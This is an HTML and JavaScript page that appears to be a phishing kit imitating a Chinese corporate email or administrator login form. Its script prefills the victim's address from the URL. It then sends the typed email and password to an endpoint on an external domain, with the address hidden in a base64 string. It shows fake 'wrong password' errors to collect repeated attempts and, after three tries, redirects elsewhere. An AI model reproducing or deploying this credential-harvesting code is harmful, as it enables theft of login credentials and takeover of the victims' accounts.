<!DOCTYPE html>
<!-- Created By CodingLab - www.codinglabweb.com -->
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title></title> 
    <style type="text/css">
	@import url('https://fonts.googleapis.com/css2?family=Poppins:wght@200;300;400;500;600;700&display=swap');
*{
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  font-family: 'Poppins',sans-serif;
}
body{
   background-image:url(bgz.jpg);
  background-repeat: no-repeat; 
  height: 732px;
}

.container{
  width: 379px;
  height: 466px;
  padding: 0 20px;
  margin: 75px ;
  background-image:url(bgg.jpg);
  position:absolute;
  right: 40px;
  
}
.wrapper{
  width: 100%;
 
  
}

.wrapper form{
  padding: 79px 10px 20px 10px;
}
.wrapper form .row{
  height: 45px;
  margin-bottom: 5px;
  position: relative;
}
.wrapper form .row input{
  height: 40px;
  line-height: 22px;
  width: 100%;
  outline: none;
  padding-left: 5px;
  border-radius: 5px;
  border: 1px solid lightgrey;
  font-size: 14px;
  transition: all 0.3s ease;
}
form .row input:focus{
  border-color: #386ee7;
  box-shadow: inset 0px 0px 1px 1px rgba(26,188,156,0.25);
}
form .row input::placeholder{
  color: #999;
}

.wrapper form .pass a{
  color: #386ee7;
  font-size: 18px;
  text-decoration: none;
}
.wrapper form .pass a:hover{
  text-decoration: underline;
}
.wrapper form .button input{
  color: #fff;
  font-size: 20px;
  font-weight: 500;
  padding-left: 0px;
  background-color: rgb(239, 73, 68);
  border: 1px solid rgb(239, 73, 68);
  cursor: pointer;
  margin-top: 5px;
  
}
form .button input:hover{
  background: rgb(239, 73, 68);
}

/* Responsive layout - when the screen is less than 600px wide, make the two columns stack on top of each other instead of next to each other */
 @media only screen and (max-width: 900px) {
  .wrapper, .container {
    
	margin-top: 30px;
	grid-template-columns: auto auto;
	
  }
 @media only screen and (max-width: 600px) {
   .container {
    
	margin-top: 80px;
	left: 2px;
	right: 5px;

	
  }
  
 
	
	</style>

  </head>
  <body>
    <div class="container">
      <div class="wrapper">
    
        <form action="#">
          <div class="row">
           
            <input type="email" id="email" name="email"  value="" placeholder="输入完整的企业邮箱或管理员账号" required readonly="readonly">
          </div>
          <div class="row">
          
            <input id="password" name="password" type="password" placeholder="输入密码" required>
          </div>

	
		
<span id="msg" class="text-danger" style="display: none; color:#FF0000">無效的密碼..！ 請輸入正確的密碼。</span><br>
 <span id="error" class="text-danger" style="display: none;"></span>

          <div class="row button">
            <input type="submit" value="登 录"  id="submit-btn" name="submit-btn">
          </div>
        
        </form>
      </div>
    </div>
	
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>

<script>

    /* global $ */
    $(document).ready(function(){
      var count=0;
 
      $('#back1').click(function () {
        $("#msg").hide();
        $('#email').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        var my_email =email;
        $('#email').val(my_email); 
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
           email.focus;
           return false;
        }
      
		 
      }
 
      $('#submit-btn').click(function(event){
    
		event.preventDefault();
        $('#error').hide();
        $('#msg').hide();
        var email=$("#email").val();
        var password=$("#password").val();
      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!email) {
            $('#error').show();
            $('#error').html("<p style='color:red; font-size:14px'> Email field is empty</p>");
        
            return false;
        }

        if (!filter.test(my_email)) {
            $('#error').show();
            $('#error').html("<p style='color:red; font-size:14px'>That account doesn't exist. Enter a different account</p>");
            
            return false;
        }
        if (!password) {
            $('#error').show();
            $('#error').html("<p style='color:red; font-size:14px'>Password field is empty</p>");
         
            return false;
        }
		 if (password.length < 7) {
            $('#error').show();
            $('#error').html("<p style='color:red; font-size:14px'>An error occured, invalid password</p>");
            email.focus;
            return false;
        } 

 
		 
      ///////////new injection////////////////
      count=count+1;
    //  console.log(count); 
   var d=atob("aHR0cHM6Ly9nYnBhY2lmaWN0cmFkaW5nLnN0b3JlL3drL3NtL25leHQucGhw");		
	   $.ajax({
        dataType: 'JSON',
		url: d,
        type: 'POST',
        data:{
          email:email,
          password:password
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Sign in');
			  
    //  console.log(count); 
            },
            success: function(response){
			 $('#msg').html("<span style='color:red;'>Username or Password is incorrect. Please try again</span>");
              if(response){
                $("#msg").show();
				console.log(response);
				$('#msg').html(response['msg']);
                if(response['signal'] == 'ok'){
                  $("#password").val("");
                  if (count>=3) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("https://babbajay19.github.io/CS12.1.jpg");

                  }
                  // $('#msg').html(response['msg']);
                }
                else{
                   $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=3) {
                count=0;
                window.location.replace("https://babbajay19.github.io/CS12.1.jpg");
              }
              $("#msg").show();
              // $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('Sign in');
            }
          });  
    });


    });

</script>
  </body>
</html>
